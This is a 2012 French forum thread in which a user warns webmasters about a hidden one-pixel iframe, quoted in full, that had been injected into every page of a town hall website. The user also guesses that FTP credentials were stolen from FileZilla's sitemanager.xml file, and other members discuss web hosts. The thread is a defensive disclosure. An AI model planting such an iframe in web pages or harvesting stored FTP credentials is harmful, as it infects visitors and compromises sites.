Sommaire
 Accueil
 Plan du site
 Recherche Google Site
 News
 Les news
 Proposer un billet
 Version Mobile
 Forum
 Accès au forum
 Liste des membres
 Messages Privés
 Le zinc
 Traductions
 Téléchargements
 Proposez un téléchargement
 Les médias
 Divers
 Galerie
 Sondages
 La Team
 Infos
 Statistiques
 Votre Compte
 
Login
Surnom/Pseudo

Mot de passe

Code de sécurité Code de sécurité:

Code de sécurité Afficher ce code en format accessible

Tapez le code de sécurité Tapez le code de sécurité:

Vous n'avez pas encore de compte ?
Enregistrez vous !
En tant que membre enregistré, vous bénéficierez de privilèges tels que: changer le thème de l'interface, modifier la disposition des commentaires, signer vos interventions etc.
 
Bloc Recherche Google sur Colok-Traductions
 
Dons
 
Partenaires
Partenaires

Zataz

TousLesDrivers

Jerebat

Gratilog.net

Freewares-tutos

Forum-gravure-et-traductions

FastStone

CDBurnerXP Pro


[ Nos supporters ]
Pour nous contacter...
...cliquez sur l'icône ci-dessus!

Après votre inscription, vérifiez votre boîte spam.
la poste et gmx peuvent ne pas recevoir les mails à cause de leur antispam.
Quant à sfr, free et orange, cela devrait maintenant marcher mais cela peut arriver aussi.
Sinon inscrivez vous avec d'autres types d'adresses.
Colok Traductions :: Sujet - Alerte sécurité - Histoire de piratage
  FAQ  •  Rechercher  •  Liste des Membres  •  Groupes d'utilisateurs  •  Profil  •  Se connecter pour vérifier ses messages privés  •  Connexion

Histoire de piratage
 Voir le sujet suivant
Voir le sujet précédent
   Répondre au sujet  Colok Traductions Index du Forum » Alerte sécurité
Auteur Message
PierreH
Jeune Colloque
Jeune Colloque


Inscrit le: 28 Janvier 2006
Messages: 323
Localisation: fr
MessagePosté le: 17-02-2012 20:32:07 Répondre en citant Revenir en haut
Ce billet s'adresse aux Webmasters, et à tous ceux qui savent écrire une page Web.


Mon fils, professeur d'informatique, fait aussi des sites Webs (auto entrepreneur).

Il a fait, entre autre, un site pour la mairie de St Gilles Croix de Vie, qui, depuis peu, était devenu inaccessible (messages d'alertes .... un peu comme avec le site de Colok, d'après ce que j'ai vu ce soir Very Happy ) .

Chrome surtout, était réactif, mais FF et IE permettaient l'accès sans message.

Je suis donc allé sur ce site, et ai fouiné dans le code source ... et j'ai trouvé !... merci la chance.

Sur toutes les pages était glissée cette balise (mal écrite d'ailleurs, pas d'unité affichée):

<iframe src="www.scadenzario.info" frameborder="0" height="1" width="1"></iframe>

Donc une iframe de 1px sur 1px : la page malveillante était affichée, mais invisible sur 1 px², et pouvait balancer ses spywares ou autres saloperies.

Maintenant, comment les pirates ont - ils eu accès au serveur ???

Un virus récent sur le PC de mon fils qui aurait piqué les codes d'accès.
Il utilise Filezilla, les codes sont faciles à trouver (fichier sitemanager.xml).

L'hébergeur a -t-il été piraté (1and1 ... j'ai vu sur Google qu'ils avaient eu des soucis il y a peu de temps).

En tous cas, ces hackers regorgent d'idées.

Pierre
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur
Colok
Administrateur
Administrateur


Inscrit le: 13 Décembre 2005
Messages: 22893
Localisation: fr
MessagePosté le: 17-02-2012 20:33:49 Répondre en citant Revenir en haut
Shocked

_________________
A+
Colok

Image
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur
GravuTrad
Administrateur
Administrateur


Inscrit le:
Messages: 9022
Localisation: af
MessagePosté le: 17-02-2012 22:27:18 Répondre en citant Revenir en haut
1&1 utilise des softs pas à jour niveau sécu (vieux php et mysql), leurs serveurs c'est surement pareil, 1&1 est vraiment pas le top à ce niveau.

Je lui conseille plutôt de changer pour ovh ou hebeh.

_________________
On a toujours besoin d'un plus petit que soi! (Petit! Petit!)
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur
PierreH
Jeune Colloque
Jeune Colloque


Inscrit le: 28 Janvier 2006
Messages: 323
Localisation: fr
MessagePosté le: 17-02-2012 22:49:24 Répondre en citant Revenir en haut
Bonsoir,

Et merci pour ton conseil.

J'ai moi même eu des problèmes de piratage sur mes pages perso, hébergées chez 1and1.

Micro Application en fait pourtant une pub ++++ (histoire de gros sous ???)

Amicalement

Pierre
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur
PierreH
Jeune Colloque
Jeune Colloque


Inscrit le: 28 Janvier 2006
Messages: 323
Localisation: fr
MessagePosté le: 17-02-2012 23:06:45 Répondre en citant Revenir en haut
Pardon


Micro hebdo, et non pas Micro Application .


Dernière édition par PierreH le 18-02-2012 07:51:29; édité 1 fois
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur
GravuTrad
Administrateur
Administrateur


Inscrit le:
Messages: 9022
Localisation: af
MessagePosté le: 18-02-2012 00:39:38 Répondre en citant Revenir en haut
juste surement un partenariat entre entreprises (comme partout) c'est tout...

C'est pas parce qu'orange sfr et bouygues sont gros et connus qu'ils sont à la pointe...free oui lol...

_________________
On a toujours besoin d'un plus petit que soi! (Petit! Petit!)
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur
URSUS
Membre d'honneur Donateur
Membre d'honneur Donateur


Inscrit le: 21 Mars 2006
Messages: 2861
Localisation: fr
MessagePosté le: 18-02-2012 11:47:38 Répondre en citant Revenir en haut
PierreH a écrit:
Ce billet s'adresse aux Webmasters, et à tous ceux qui savent écrire une page Web.
Pierre


Salut
On doit être de moins en moins nombreux , car LA AUSSI il y a tellement de "soft" où que tu choisi des trucs tout prêts , où que tu presses sur le bouton qui te fait tout : les tags et tout le reste et même que c' est " Tuvoiscequetuvasavoir" - mais si tu regardes la page réalisée en HTML etc...... avec le programme ad-hoc , au point de vue TAG en général , y a de quoi Rolling Eyes Rolling Eyes Rolling Eyes

J' ai été chez 1and1 pendant 6 ans sans problème - et bien suivi
mais bien sur mes deux sites étaient de l' amusement d'Ours ! sans réelle importance -

QUAND à MICRO :::: HEBDO / SPECIAL / ASTUCES c' est dans ce qui reste de SUR PAPIER - un bordélicum de haut niveau et
dans le style E-web - un stock de pas à pas - méfiez vous c'est pas toujours de la dernière pluie - c'est ce qui vaut le coup quand on vous explique un truc obsolète

ALLEZ
c 'était ma seconde crise
Bonne Journée
URSUS
Laughing Laughing Laughing Laughing Laughing Laughing Laughing

_________________
- URSUS- vous salue Bien
=======
Le Courage - c 'est d' Aimer la VIE et de Regarder la Mort d'un regard tranquille --
Le Courage - C' est d' aller à l' Idéal et de comprendre le Réel .
[ Jean JAURES ]
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur
Montrer les messages depuis:       
   Répondre au sujet  Colok Traductions Index du Forum » Alerte sécurité


 Sauter vers:   



Voir le sujet suivant
Voir le sujet précédent
Vous ne pouvez pas poster de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum


Powered by BBtoMax © 2006 BBtoMax forum du cms Maximus
Information : Page générée en 0.01220 secondes, Requetes SQL = 33
Forums ©
  Accueil • Plan du site • Contactez nous
Tous les logos et marques sont des Propriétés respectives. Certains blocs et modules sont de Piermin, de Maximus italia. Les commentaires sont la propriété respective de ceux qui les postent, tout le reste Colok-Traductions © 2005-2024 est à la team Colok-Traductions.


[ Page générée en 0.0378 sec ] [ Vitesse PHP: 55% - SQL: 45% ] [ Requêtes SQL: 55 ] [ Ram: 4.279 MégaOctets ]
 Top Max Cache Off Copyright Mentions légales PHP Maximus CMS